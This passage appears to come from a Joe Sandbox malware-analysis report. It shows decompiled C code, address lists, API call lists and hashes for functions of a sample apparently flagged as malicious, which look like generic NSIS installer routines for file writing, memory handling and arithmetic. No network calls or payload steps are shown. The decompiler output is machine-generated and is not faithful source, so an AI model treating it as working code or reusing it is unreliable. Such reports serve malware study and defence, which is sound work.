                                                                        									__edx =  *(__esp + 0x10);
                                                                        									__ecx = __ecx * __edx;
                                                                        									asm("sbb edx, edx");
                                                                        									__edx = __edx & __ecx;
                                                                        									__eax = __eax &  *(0x7249409c + __edx * 4);
                                                                        								}
                                                                        								_push(__eax);
                                                                        								goto L15;
                                                                        							case 2:
                                                                        								__eax = E72491510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                        								goto L16;
                                                                        							case 3:
                                                                        								__ecx =  *0x7249506c;
                                                                        								__edx = __ecx - 1;
                                                                        								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                                        								__eax =  *0x7249506c;
                                                                        								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                                        								goto L17;
                                                                        							case 4:
                                                                        								__eax = lstrcpynW(__edi,  *__eax,  *0x7249506c);
                                                                        								goto L17;
                                                                        							case 5:
                                                                        								_push( *0x7249506c);
                                                                        								_push(__edi);
                                                                        								_push( *__eax);
                                                                        								__imp__StringFromGUID2();
                                                                        								goto L17;
                                                                        							case 6:
                                                                        								_push( *__esi);
                                                                        								L15:
                                                                        								__eax = wsprintfW(__edi, 0x72495000);
                                                                        								L16:
                                                                        								__esp = __esp + 0xc;
                                                                        								goto L17;
                                                                        						}
                                                                        					}
                                                                        					L17:
                                                                        					_t26 =  *(_t43 + 0x14);
                                                                        					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                        						GlobalFree(_t26);
                                                                        					}
                                                                        					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                        					if(_t27 != 0) {
                                                                        						if(_t27 != 0xffffffff) {
                                                                        							if(_t27 > 0) {
                                                                        								E72491381(_t27 - 1, _t40);
                                                                        								goto L26;
                                                                        							}
                                                                        						} else {
                                                                        							E72491312(_t40);
                                                                        							L26:
                                                                        						}
                                                                        					}
                                                                        					_t44 = _t44 - 1;
                                                                        					_t43 = _t43 - 0x20;
                                                                        				} while (_t44 >= 0);
                                                                        				return GlobalFree(_t40);
                                                                        			}











                                                                        0x7249265f
                                                                        0x72492661
                                                                        0x72492665
                                                                        0x72492674
                                                                        0x72492678
                                                                        0x7249267d
                                                                        0x7249267d
                                                                        0x72492685
                                                                        0x7249268c
                                                                        0x72492692
                                                                        0x00000000
                                                                        0x72492699
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x724926a1
                                                                        0x724926a5
                                                                        0x724926a8
                                                                        0x724926ac
                                                                        0x724926b3
                                                                        0x724926b7
                                                                        0x724926bd
                                                                        0x724926bf
                                                                        0x724926c1
                                                                        0x724926c1
                                                                        0x724926c8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x724926d1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x724926d8
                                                                        0x724926de
                                                                        0x724926e8
                                                                        0x724926ee
                                                                        0x724926f3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72492714
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x724926fa
                                                                        0x72492700
                                                                        0x72492701
                                                                        0x72492703
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x7249271c
                                                                        0x7249271e
                                                                        0x72492724
                                                                        0x7249272a
                                                                        0x7249272a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72492692
                                                                        0x7249272d
                                                                        0x7249272d
                                                                        0x72492732
                                                                        0x72492743
                                                                        0x72492743
                                                                        0x72492749
                                                                        0x7249274e
                                                                        0x72492753
                                                                        0x7249275f
                                                                        0x72492764
                                                                        0x00000000
                                                                        0x72492769
                                                                        0x72492755
                                                                        0x72492756
                                                                        0x7249276a
                                                                        0x7249276a
                                                                        0x72492753
                                                                        0x7249276b
                                                                        0x7249276c
                                                                        0x7249276f
                                                                        0x72492783

                                                                        APIs
                                                                          • Part of subcall function 724912BB: GlobalAlloc.KERNELBASE(00000040,?,724912DB,?,7249137F,00000019,724911CA,-000000A0), ref: 724912C5
                                                                        • GlobalFree.KERNEL32 ref: 72492743
                                                                        • GlobalFree.KERNEL32 ref: 72492778
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.883195763.0000000072491000.00000020.00000001.01000000.00000006.sdmp, Offset: 72490000, based on PE: true
                                                                        • Associated: 00000000.00000002.883191252.0000000072490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883203445.0000000072494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883208180.0000000072496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72490000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Free$Alloc
                                                                        • String ID:
                                                                        • API String ID: 1780285237-0
                                                                        • Opcode ID: 58cc33e2be00573b734d0d720a3dad37f25f022d2f13fda6be86141bb4cc1906
                                                                        • Instruction ID: be42949cd64e40f7ac04e75216ffd938858c0e10e5b18583b3781ed4f0b0bcc8
                                                                        • Opcode Fuzzy Hash: 58cc33e2be00573b734d0d720a3dad37f25f022d2f13fda6be86141bb4cc1906
                                                                        • Instruction Fuzzy Hash: 1131D032104901DFC72ADF69C984E2A7FB6FB95304722496CF1C2B3210C7325856CF69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00402950(void* __ebx, void* __eflags) {
                                                                        				WCHAR* _t26;
                                                                        				void* _t29;
                                                                        				long _t37;
                                                                        				void* _t49;
                                                                        				void* _t52;
                                                                        				void* _t54;
                                                                        				void* _t56;
                                                                        				void* _t59;
                                                                        				void* _t60;
                                                                        				void* _t61;
                                                                        
                                                                        				_t49 = __ebx;
                                                                        				_t52 = 0xfffffd66;
                                                                        				_t26 = E00402DA6(0xfffffff0);
                                                                        				_t55 = _t26;
                                                                        				 *(_t61 - 0x40) = _t26;
                                                                        				if(E00405FAE(_t26) == 0) {
                                                                        					E00402DA6(0xffffffed);
                                                                        				}
                                                                        				E00406133(_t55);
                                                                        				_t29 = E00406158(_t55, 0x40000000, 2);
                                                                        				 *(_t61 + 8) = _t29;
                                                                        				if(_t29 != 0xffffffff) {
                                                                        					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                                        					if( *(_t61 - 0x28) != _t49) {
                                                                        						_t37 =  *0x42a274;
                                                                        						 *(_t61 - 0x44) = _t37;
                                                                        						_t54 = GlobalAlloc(0x40, _t37);
                                                                        						if(_t54 != _t49) {
                                                                        							E004035F8(_t49);
                                                                        							E004035E2(_t54,  *(_t61 - 0x44));
                                                                        							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                                        							 *(_t61 - 0x10) = _t59;
                                                                        							if(_t59 != _t49) {
                                                                        								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                                        								while( *_t59 != _t49) {
                                                                        									_t51 =  *_t59;
                                                                        									_t60 = _t59 + 8;
                                                                        									 *(_t61 - 0x3c) =  *_t59;
                                                                        									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                        									_t59 = _t60 +  *(_t61 - 0x3c);
                                                                        								}
                                                                        								GlobalFree( *(_t61 - 0x10));
                                                                        							}
                                                                        							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                                        							GlobalFree(_t54);
                                                                        							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                                        						}
                                                                        					}
                                                                        					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                                        					CloseHandle( *(_t61 + 8));
                                                                        				}
                                                                        				_t56 = 0xfffffff3;
                                                                        				if(_t52 < _t49) {
                                                                        					_t56 = 0xffffffef;
                                                                        					DeleteFileW( *(_t61 - 0x40));
                                                                        					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                        				}
                                                                        				_push(_t56);
                                                                        				E00401423();
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                                                                        				return 0;
                                                                        			}













                                                                        0x00402950
                                                                        0x00402952
                                                                        0x00402957
                                                                        0x0040295c
                                                                        0x0040295f
                                                                        0x00402969
                                                                        0x0040296d
                                                                        0x0040296d
                                                                        0x00402973
                                                                        0x00402980
                                                                        0x00402988
                                                                        0x0040298b
                                                                        0x00402997
                                                                        0x0040299a
                                                                        0x004029a0
                                                                        0x004029ae
                                                                        0x004029b3
                                                                        0x004029b7
                                                                        0x004029ba
                                                                        0x004029c3
                                                                        0x004029cf
                                                                        0x004029d3
                                                                        0x004029d6
                                                                        0x004029e0
                                                                        0x004029ff
                                                                        0x004029e7
                                                                        0x004029ec
                                                                        0x004029f4
                                                                        0x004029f7
                                                                        0x004029fc
                                                                        0x004029fc
                                                                        0x00402a06
                                                                        0x00402a06
                                                                        0x00402a13
                                                                        0x00402a19
                                                                        0x00402a1f
                                                                        0x00402a1f
                                                                        0x004029b7
                                                                        0x00402a33
                                                                        0x00402a35
                                                                        0x00402a35
                                                                        0x00402a3f
                                                                        0x00402a40
                                                                        0x00402a44
                                                                        0x00402a48
                                                                        0x00402a4e
                                                                        0x00402a4e
                                                                        0x00402a55
                                                                        0x004022f1
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                        • GlobalFree.KERNEL32 ref: 00402A06
                                                                        • GlobalFree.KERNEL32 ref: 00402A19
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                        • String ID:
                                                                        • API String ID: 2667972263-0
                                                                        • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                        • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                        • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                        • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                        				char _v68;
                                                                        				char _v132;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t23;
                                                                        				signed int _t24;
                                                                        				void* _t31;
                                                                        				void* _t33;
                                                                        				void* _t34;
                                                                        				void* _t44;
                                                                        				signed int _t46;
                                                                        				signed int _t50;
                                                                        				signed int _t52;
                                                                        				signed int _t53;
                                                                        				signed int _t55;
                                                                        
                                                                        				_t23 = _a16;
                                                                        				_t53 = _a12;
                                                                        				_t44 = 0xffffffdc;
                                                                        				if(_t23 == 0) {
                                                                        					_push(0x14);
                                                                        					_pop(0);
                                                                        					_t24 = _t53;
                                                                        					if(_t53 < 0x100000) {
                                                                        						_push(0xa);
                                                                        						_pop(0);
                                                                        						_t44 = 0xffffffdd;
                                                                        					}
                                                                        					if(_t53 < 0x400) {
                                                                        						_t44 = 0xffffffde;
                                                                        					}
                                                                        					if(_t53 < 0xffff3333) {
                                                                        						_t52 = 0x14;
                                                                        						asm("cdq");
                                                                        						_t24 = 1 / _t52 + _t53;
                                                                        					}
                                                                        					_t25 = _t24 & 0x00ffffff;
                                                                        					_t55 = _t24 >> 0;
                                                                        					_t46 = 0xa;
                                                                        					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                        				} else {
                                                                        					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                        					_t50 = 0;
                                                                        				}
                                                                        				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                        				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                                                                        				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                                                                        				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                        				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                                                                        			}



















                                                                        0x00404e7a
                                                                        0x00404e7f
                                                                        0x00404e87
                                                                        0x00404e88
                                                                        0x00404e95
                                                                        0x00404e9d
                                                                        0x00404e9e
                                                                        0x00404ea0
                                                                        0x00404ea2
                                                                        0x00404ea4
                                                                        0x00404ea7
                                                                        0x00404ea7
                                                                        0x00404eae
                                                                        0x00404eb4
                                                                        0x00404eb4
                                                                        0x00404ebb
                                                                        0x00404ec2
                                                                        0x00404ec5
                                                                        0x00404ec8
                                                                        0x00404ec8
                                                                        0x00404ecc
                                                                        0x00404edc
                                                                        0x00404ede
                                                                        0x00404ee1
                                                                        0x00404e8a
                                                                        0x00404e8a
                                                                        0x00404e91
                                                                        0x00404e91
                                                                        0x00404ee9
                                                                        0x00404ef4
                                                                        0x00404f0a
                                                                        0x00404f1b
                                                                        0x00404f37

                                                                        APIs
                                                                        • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                        • wsprintfW.USER32 ref: 00404F1B
                                                                        • SetDlgItemTextW.USER32 ref: 00404F2E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s$H7B
                                                                        • API String ID: 3540041739-107966168
                                                                        • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                        • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                        • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                                        • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E72491979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                                        				void* _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				char _v76;
                                                                        				void _t45;
                                                                        				signed int _t46;
                                                                        				signed int _t47;
                                                                        				signed int _t48;
                                                                        				signed int _t57;
                                                                        				signed int _t58;
                                                                        				signed int _t59;
                                                                        				signed int _t60;
                                                                        				signed int _t61;
                                                                        				void* _t67;
                                                                        				void* _t68;
                                                                        				void* _t69;
                                                                        				void* _t70;
                                                                        				void* _t71;
                                                                        				signed int _t77;
                                                                        				void* _t81;
                                                                        				signed int _t83;
                                                                        				signed int _t85;
                                                                        				signed int _t87;
                                                                        				signed int _t90;
                                                                        				void* _t101;
                                                                        
                                                                        				_t85 = __edx;
                                                                        				 *0x7249506c = _a8;
                                                                        				_t77 = 0;
                                                                        				 *0x72495070 = _a16;
                                                                        				_v12 = 0;
                                                                        				_v8 = E724912E3();
                                                                        				_t90 = E724913B1(_t42);
                                                                        				_t87 = _t85;
                                                                        				_t81 = E724912E3();
                                                                        				_a8 = _t81;
                                                                        				_t45 =  *_t81;
                                                                        				if(_t45 != 0x7e && _t45 != 0x21) {
                                                                        					_a16 = E724912E3();
                                                                        					_t77 = E724913B1(_t74);
                                                                        					_v12 = _t85;
                                                                        					GlobalFree(_a16);
                                                                        					_t81 = _a8;
                                                                        				}
                                                                        				_t46 =  *_t81 & 0x0000ffff;
                                                                        				_t101 = _t46 - 0x2f;
                                                                        				if(_t101 > 0) {
                                                                        					_t47 = _t46 - 0x3c;
                                                                        					__eflags = _t47;
                                                                        					if(_t47 == 0) {
                                                                        						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
                                                                        						if( *((short*)(_t81 + 2)) != 0x3c) {
                                                                        							__eflags = _t87 - _v12;
                                                                        							if(__eflags > 0) {
                                                                        								L56:
                                                                        								_t48 = 0;
                                                                        								__eflags = 0;
                                                                        								L57:
                                                                        								asm("cdq");
                                                                        								L58:
                                                                        								_t90 = _t48;
                                                                        								_t87 = _t85;
                                                                        								L59:
                                                                        								E72491510(_t85, _t90, _t87,  &_v76);
                                                                        								E72491312( &_v76);
                                                                        								GlobalFree(_v8);
                                                                        								return GlobalFree(_a8);
                                                                        							}
                                                                        							if(__eflags < 0) {
                                                                        								L49:
                                                                        								__eflags = 0;
                                                                        								L50:
                                                                        								_t48 = 1;
                                                                        								goto L57;
                                                                        							}
                                                                        							__eflags = _t90 - _t77;
                                                                        							if(_t90 < _t77) {
                                                                        								goto L49;
                                                                        							}
                                                                        							goto L56;
                                                                        						}
                                                                        						_t85 = _t87;
                                                                        						_t48 = E72493050(_t90, _t77, _t85);
                                                                        						goto L58;
                                                                        					}
                                                                        					_t57 = _t47 - 1;
                                                                        					__eflags = _t57;
                                                                        					if(_t57 == 0) {
                                                                        						__eflags = _t90 - _t77;
                                                                        						if(_t90 != _t77) {
                                                                        							goto L56;
                                                                        						}
                                                                        						__eflags = _t87 - _v12;
                                                                        						if(_t87 != _v12) {
                                                                        							goto L56;
                                                                        						}
                                                                        						goto L49;
                                                                        					}
                                                                        					_t58 = _t57 - 1;
                                                                        					__eflags = _t58;
                                                                        					if(_t58 == 0) {
                                                                        						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
                                                                        						if( *((short*)(_t81 + 2)) != 0x3e) {
                                                                        							__eflags = _t87 - _v12;
                                                                        							if(__eflags < 0) {
                                                                        								goto L56;
                                                                        							}
                                                                        							if(__eflags > 0) {
                                                                        								goto L49;
                                                                        							}
                                                                        							__eflags = _t90 - _t77;
                                                                        							if(_t90 <= _t77) {
                                                                        								goto L56;
                                                                        							}
                                                                        							goto L49;
                                                                        						}
                                                                        						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
                                                                        						_t85 = _t87;
                                                                        						_t59 = _t90;
                                                                        						_t83 = _t77;
                                                                        						if( *((short*)(_t81 + 4)) != 0x3e) {
                                                                        							_t48 = E72493070(_t59, _t83, _t85);
                                                                        						} else {
                                                                        							_t48 = E724930A0(_t59, _t83, _t85);
                                                                        						}
                                                                        						goto L58;
                                                                        					}
                                                                        					_t60 = _t58 - 0x20;
                                                                        					__eflags = _t60;
                                                                        					if(_t60 == 0) {
                                                                        						_t90 = _t90 ^ _t77;
                                                                        						_t87 = _t87 ^ _v12;
                                                                        						goto L59;
                                                                        					}
                                                                        					_t61 = _t60 - 0x1e;
                                                                        					__eflags = _t61;
                                                                        					if(_t61 == 0) {
                                                                        						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
                                                                        						if( *((short*)(_t81 + 2)) != 0x7c) {
                                                                        							_t90 = _t90 | _t77;
                                                                        							_t87 = _t87 | _v12;
                                                                        							goto L59;
                                                                        						}
                                                                        						__eflags = _t90 | _t87;
                                                                        						if((_t90 | _t87) != 0) {
                                                                        							goto L49;
                                                                        						}
                                                                        						__eflags = _t77 | _v12;
                                                                        						if((_t77 | _v12) != 0) {
                                                                        							goto L49;
                                                                        						}
                                                                        						goto L56;
                                                                        					}
                                                                        					__eflags = _t61 == 0;
                                                                        					if(_t61 == 0) {
                                                                        						_t90 =  !_t90;
                                                                        						_t87 =  !_t87;
                                                                        					}
                                                                        					goto L59;
                                                                        				}
                                                                        				if(_t101 == 0) {
                                                                        					L21:
                                                                        					__eflags = _t77 | _v12;
                                                                        					if((_t77 | _v12) != 0) {
                                                                        						_v24 = E72492EE0(_t90, _t87, _t77, _v12);
                                                                        						_v20 = _t85;
                                                                        						_t48 = E72492F90(_t90, _t87, _t77, _v12);
                                                                        						_t81 = _a8;
                                                                        					} else {
                                                                        						_v24 = _v24 & 0x00000000;
                                                                        						_v20 = _v20 & 0x00000000;
                                                                        						_t48 = _t90;
                                                                        						_t85 = _t87;
                                                                        					}
                                                                        					__eflags =  *_t81 - 0x2f;
                                                                        					if( *_t81 != 0x2f) {
                                                                        						goto L58;
                                                                        					} else {
                                                                        						_t90 = _v24;
                                                                        						_t87 = _v20;
                                                                        						goto L59;
                                                                        					}
                                                                        				}
                                                                        				_t67 = _t46 - 0x21;
                                                                        				if(_t67 == 0) {
                                                                        					_t48 = 0;
                                                                        					__eflags = _t90 | _t87;
                                                                        					if((_t90 | _t87) != 0) {
                                                                        						goto L57;
                                                                        					}
                                                                        					goto L50;
                                                                        				}
                                                                        				_t68 = _t67 - 4;
                                                                        				if(_t68 == 0) {
                                                                        					goto L21;
                                                                        				}
                                                                        				_t69 = _t68 - 1;
                                                                        				if(_t69 == 0) {
                                                                        					__eflags =  *((short*)(_t81 + 2)) - 0x26;
                                                                        					if( *((short*)(_t81 + 2)) != 0x26) {
                                                                        						_t90 = _t90 & _t77;
                                                                        						_t87 = _t87 & _v12;
                                                                        						goto L59;
                                                                        					}
                                                                        					__eflags = _t90 | _t87;
                                                                        					if((_t90 | _t87) == 0) {
                                                                        						goto L56;
                                                                        					}
                                                                        					__eflags = _t77 | _v12;
                                                                        					if((_t77 | _v12) == 0) {
                                                                        						goto L56;
                                                                        					}
                                                                        					goto L49;
                                                                        				}
                                                                        				_t70 = _t69 - 4;
                                                                        				if(_t70 == 0) {
                                                                        					_t48 = E72492EA0(_t90, _t87, _t77, _v12);
                                                                        					goto L58;
                                                                        				} else {
                                                                        					_t71 = _t70 - 1;
                                                                        					if(_t71 == 0) {
                                                                        						_t90 = _t90 + _t77;
                                                                        						asm("adc edi, [ebp-0x8]");
                                                                        					} else {
                                                                        						if(_t71 == 0) {
                                                                        							_t90 = _t90 - _t77;
                                                                        							asm("sbb edi, [ebp-0x8]");
                                                                        						}
                                                                        					}
                                                                        					goto L59;
                                                                        				}
                                                                        			}





























                                                                        0x72491979
                                                                        0x72491983
                                                                        0x7249198c
                                                                        0x7249198f
                                                                        0x72491994
                                                                        0x7249199d
                                                                        0x724919a6
                                                                        0x724919a8
                                                                        0x724919af
                                                                        0x724919b1
                                                                        0x724919b4
                                                                        0x724919bb
                                                                        0x724919c9
                                                                        0x724919d2
                                                                        0x724919d7
                                                                        0x724919da
                                                                        0x724919e0
                                                                        0x724919e0
                                                                        0x724919e3
                                                                        0x724919e6
                                                                        0x724919e9
                                                                        0x72491ab1
                                                                        0x72491ab1
                                                                        0x72491ab4
                                                                        0x72491b34
                                                                        0x72491b39
                                                                        0x72491b48
                                                                        0x72491b4b
                                                                        0x72491b53
                                                                        0x72491b53
                                                                        0x72491b53
                                                                        0x72491b55
                                                                        0x72491b55
                                                                        0x72491b56
                                                                        0x72491b56
                                                                        0x72491b58
                                                                        0x72491b5a
                                                                        0x72491b60
                                                                        0x72491b69
                                                                        0x72491b7a
                                                                        0x72491b85
                                                                        0x72491b85
                                                                        0x72491b4d
                                                                        0x72491b2f
                                                                        0x72491b2f
                                                                        0x72491b31
                                                                        0x72491b31
                                                                        0x00000000
                                                                        0x72491b31
                                                                        0x72491b4f
                                                                        0x72491b51
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72491b51
                                                                        0x72491b3d
                                                                        0x72491b41
                                                                        0x00000000
                                                                        0x72491b41
                                                                        0x72491ab6
                                                                        0x72491ab6
                                                                        0x72491ab7
                                                                        0x72491b26
                                                                        0x72491b28
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72491b2a
                                                                        0x72491b2d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72491b2d
                                                                        0x72491ab9
                                                                        0x72491ab9
                                                                        0x72491aba
                                                                        0x72491af7
                                                                        0x72491afc
                                                                        0x72491b19
                                                                        0x72491b1c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72491b1e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72491b20
                                                                        0x72491b22
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72491b24
                                                                        0x72491afe
                                                                        0x72491b03
                                                                        0x72491b05
                                                                        0x72491b07
                                                                        0x72491b09
                                                                        0x72491b12
                                                                        0x72491b0b
                                                                        0x72491b0b
                                                                        0x72491b0b
                                                                        0x00000000
                                                                        0x72491b09
                                                                        0x72491abc
                                                                        0x72491abc
                                                                        0x72491abf
                                                                        0x72491af0
                                                                        0x72491af2
                                                                        0x00000000
                                                                        0x72491af2
                                                                        0x72491ac1
                                                                        0x72491ac1
                                                                        0x72491ac4
                                                                        0x72491ad7
                                                                        0x72491adc
                                                                        0x72491ae9
                                                                        0x72491aeb
                                                                        0x00000000
                                                                        0x72491aeb
                                                                        0x72491ade
                                                                        0x72491ae0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72491ae2
                                                                        0x72491ae5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72491ae7
                                                                        0x72491ac7
                                                                        0x72491ac8
                                                                        0x72491ace
                                                                        0x72491ad0
                                                                        0x72491ad0
                                                                        0x00000000
                                                                        0x72491ac8
                                                                        0x724919ef
                                                                        0x72491a68
                                                                        0x72491a6a
                                                                        0x72491a6d
                                                                        0x72491a8b
                                                                        0x72491a8e
                                                                        0x72491a94
                                                                        0x72491a99
                                                                        0x72491a6f
                                                                        0x72491a6f
                                                                        0x72491a73
                                                                        0x72491a77
                                                                        0x72491a79
                                                                        0x72491a79
                                                                        0x72491a9c
                                                                        0x72491aa0
                                                                        0x00000000
                                                                        0x72491aa6
                                                                        0x72491aa6
                                                                        0x72491aa9
                                                                        0x00000000
                                                                        0x72491aa9
                                                                        0x72491aa0
                                                                        0x724919f1
                                                                        0x724919f4
                                                                        0x72491a59
                                                                        0x72491a5b
                                                                        0x72491a5d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72491a63
                                                                        0x724919f6
                                                                        0x724919f9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x724919fb
                                                                        0x724919fc
                                                                        0x72491a32
                                                                        0x72491a37
                                                                        0x72491a4f
                                                                        0x72491a51
                                                                        0x00000000
                                                                        0x72491a51
                                                                        0x72491a39
                                                                        0x72491a3b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72491a41
                                                                        0x72491a44
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72491a4a
                                                                        0x724919fe
                                                                        0x72491a01
                                                                        0x72491a28
                                                                        0x00000000
                                                                        0x72491a03
                                                                        0x72491a03
                                                                        0x72491a04
                                                                        0x72491a18
                                                                        0x72491a1a
                                                                        0x72491a06
                                                                        0x72491a08
                                                                        0x72491a0e
                                                                        0x72491a10
                                                                        0x72491a10
                                                                        0x72491a08
                                                                        0x00000000
                                                                        0x72491a04

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.883195763.0000000072491000.00000020.00000001.01000000.00000006.sdmp, Offset: 72490000, based on PE: true
